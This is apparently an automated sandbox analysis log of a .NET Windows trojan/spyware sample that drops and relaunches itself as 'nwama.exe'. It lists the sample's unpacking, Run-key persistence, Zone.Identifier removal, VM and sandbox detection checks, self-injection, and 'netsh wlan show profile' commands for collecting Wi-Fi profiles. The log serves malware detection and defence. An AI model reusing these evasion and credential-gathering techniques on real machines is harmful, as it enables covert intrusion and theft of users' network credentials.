                  Source: nwama.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: 1.2.sample2.exe.400000.0.unpack, nhx.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 1.2.sample2.exe.400000.0.unpack, nhx.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 11.2.nwama.exe.400000.0.unpack, nhx.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.nwama.exe.400000.0.unpack, nhx.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 18.2.nwama.exe.400000.0.unpack, nhx.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 18.2.nwama.exe.400000.0.unpack, nhx.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@18/10@3/2
                  Source: C:\Users\user\Desktop\sample2.exe | Code function: 0_2_06D1051A AdjustTokenPrivileges,
                  Source: C:\Users\user\Desktop\sample2.exe | Code function: 0_2_06D104E3 AdjustTokenPrivileges,
                  Source: C:\Users\user\Desktop\sample2.exe | Code function: 1_2_0163B1E6 AdjustTokenPrivileges,
                  Source: C:\Users\user\Desktop\sample2.exe | Code function: 1_2_0163B1AF AdjustTokenPrivileges,
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_06A6051A AdjustTokenPrivileges,
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_06A604E3 AdjustTokenPrivileges,
                  Source: C:\Users\user\Desktop\sample2.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\sample2.exe.log
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Mutant created: \Sessions\1\BaseNamedObjects\KXEawVjqkPnOFR
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:900:120:WilError_01
                  Source: C:\Users\user\Desktop\sample2.exe | File created: C:\Users\user\AppData\Local\Temp\nwama
                  Source: sample2.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\sample2.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\sample2.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\Desktop\sample2.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\Desktop\sample2.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\sample2.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\Desktop\sample2.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\Desktop\sample2.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\sample2.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\sample2.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\sample2.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\sample2.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\Desktop\sample2.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: sample2.exe | Metadefender: Detection: 25%
                  Source: sample2.exe | ReversingLabs: Detection: 80%
                  Source: C:\Users\user\Desktop\sample2.exe | File read: C:\Users\user\Desktop\sample2.exe
                  Source: unknown | Process created: C:\Users\user\Desktop\sample2.exe 'C:\Users\user\Desktop\sample2.exe'
                  Source: unknown | Process created: C:\Users\user\Desktop\sample2.exe {path}
                  Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe 'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe'
                  Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe {path}
                  Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe 'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe'
                  Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe {path}
                  Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\sample2.exe | Process created: C:\Users\user\Desktop\sample2.exe {path}
                  Source: C:\Users\user\Desktop\sample2.exe | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Process created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe {path}
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Process created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe {path}
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: C:\Users\user\Desktop\sample2.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\sample2.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                  Source: C:\Users\user\Desktop\sample2.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: sample2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: C:\Users\user\Desktop\sample2.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                  Source: sample2.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\Users\Vendetta\source\repos\Defender Protect\Defender Protect\obj\Debug\Defender Protect.pdb | source: sample2.exe, 00000000.00000002.665736666.0000000006290000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.720529552.0000000002F86000.00000004.00000001.sdmp, nwama.exe, 0000000F.00000002.736332738.00000000031A6000.00000004.00000001.sdmp
                  Source: Binary string: mscorrc.pdb | source: sample2.exe, 00000000.00000002.667266340.0000000006CA0000.00000002.00000001.sdmp, sample2.exe, 00000001.00000002.999576706.0000000006670000.00000002.00000001.sdmp, nwama.exe, 0000000A.00000002.725183141.00000000069F0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.1000299165.0000000006510000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.740831894.0000000006B60000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.998659429.0000000005F50000.00000002.00000001.sdmp

                  Data Obfuscation:

                  .NET source code contains potential unpacker
                  Source: sample2.exe, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.2.sample2.exe.590000.0.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.sample2.exe.590000.0.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: nwama.exe.1.dr, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 1.0.sample2.exe.ee0000.0.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 1.2.sample2.exe.ee0000.1.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 10.0.nwama.exe.7c0000.0.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 10.2.nwama.exe.7c0000.0.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.2.nwama.exe.ae0000.1.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.nwama.exe.ae0000.0.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 15.2.nwama.exe.8d0000.0.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 15.0.nwama.exe.8d0000.0.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 18.2.nwama.exe.520000.1.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 18.0.nwama.exe.520000.0.unpack, ClassCore.cs | .Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: C:\Users\user\Desktop\sample2.exe | Code function: 0_2_04DE8872 push cs; retf
                  Source: C:\Users\user\Desktop\sample2.exe | Code function: 0_2_04DE8B24 push esp; retf
                  Source: C:\Users\user\Desktop\sample2.exe | Code function: 1_2_0654B3E0 push es; retf
                  Source: C:\Users\user\Desktop\sample2.exe | Code function: 1_2_06543E06 push es; ret
                  Source: C:\Users\user\Desktop\sample2.exe | Code function: 1_2_06548575 pushfd ; ret
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05018872 push cs; retf
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 10_2_05018B24 push esp; retf
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062AB3E8 push es; retf
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Code function: 11_2_062A857B pushfd ; ret
                  Source: initial sample | Static PE information: section name: .text entropy: 7.05584068406
                  Source: C:\Users\user\Desktop\sample2.exe | File created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                  Source: C:\Users\user\Desktop\sample2.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run nwama

                  Hooking and other Techniques for Hiding and Protection:

                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Users\user\Desktop\sample2.exe | File opened: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File opened: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\Desktop\sample2.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\Desktop\sample2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match File source: Process Memory Space: sample2.exe PID: 7104, type: MEMORY
Source: Yara match File source: Process Memory Space: nwama.exe PID: 6508, type: MEMORY
Source: Yara match File source: Process Memory Space: nwama.exe PID: 5848, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\sample2.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: sample2.exe, 00000000.00000002.659352287.0000000002CA1000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.720364250.0000000002E91000.00000004.00000001.sdmp, nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: sample2.exe, 00000000.00000002.659352287.0000000002CA1000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.720364250.0000000002E91000.00000004.00000001.sdmp, nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\sample2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\sample2.exe TID: 7132 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\sample2.exe TID: 6492 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\sample2.exe TID: 6760 Thread sleep count: 121 > 30
Source: C:\Users\user\Desktop\sample2.exe TID: 6760 Thread sleep time: -60500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 6676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 6344 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 6796 Thread sleep count: 97 > 30
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 6796 Thread sleep time: -48500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 960 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 1320 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 4088 Thread sleep time: -49000s >= -30000s
Source: C:\Users\user\Desktop\sample2.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\sample2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\sample2.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe Last function: Thread delayed
Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II,SOFTWARE\Microsoft\Windows Defender\Features
Source: sample2.exe, 00000001.00000002.997991959.0000000005A30000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.998682152.0000000005650000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.997538946.0000000005090000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: nwama.exe, 0000000B.00000002.989383094.0000000001282000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW2
Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: sample2.exe, 00000001.00000002.997991959.0000000005A30000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.998682152.0000000005650000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.997538946.0000000005090000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: sample2.exe, 00000001.00000002.997991959.0000000005A30000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.998682152.0000000005650000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.997538946.0000000005090000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: nwama.exe, 0000000B.00000002.989659236.00000000012FD000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sample2.exe, 00000001.00000002.997991959.0000000005A30000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.998682152.0000000005650000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.997538946.0000000005090000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\sample2.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\sample2.exe Code function: 1_2_06540717 KiUserExceptionDispatcher,LdrInitializeThunk,
Source: C:\Users\user\Desktop\sample2.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\sample2.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\sample2.exe Memory written: C:\Users\user\Desktop\sample2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe Memory written: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\sample2.exe Process created: C:\Users\user\Desktop\sample2.exe {path}
Source: C:\Users\user\Desktop\sample2.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe Process created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe {path}
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Source: sample2.exe, 00000001.00000002.989680308.0000000001DA0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.989872146.00000000017E0000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.989355954.0000000001260000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: sample2.exe, 00000001.00000002.989680308.0000000001DA0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.989872146.00000000017E0000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.989355954.0000000001260000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: sample2.exe, 00000001.00000002.989680308.0000000001DA0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.989872146.00000000017E0000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.989355954.0000000001260000.00000002.00000001.sdmp Binary or memory string: Progman
Source: sample2.exe, 00000001.00000002.989680308.0000000001DA0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.989872146.00000000017E0000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.989355954.0000000001260000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
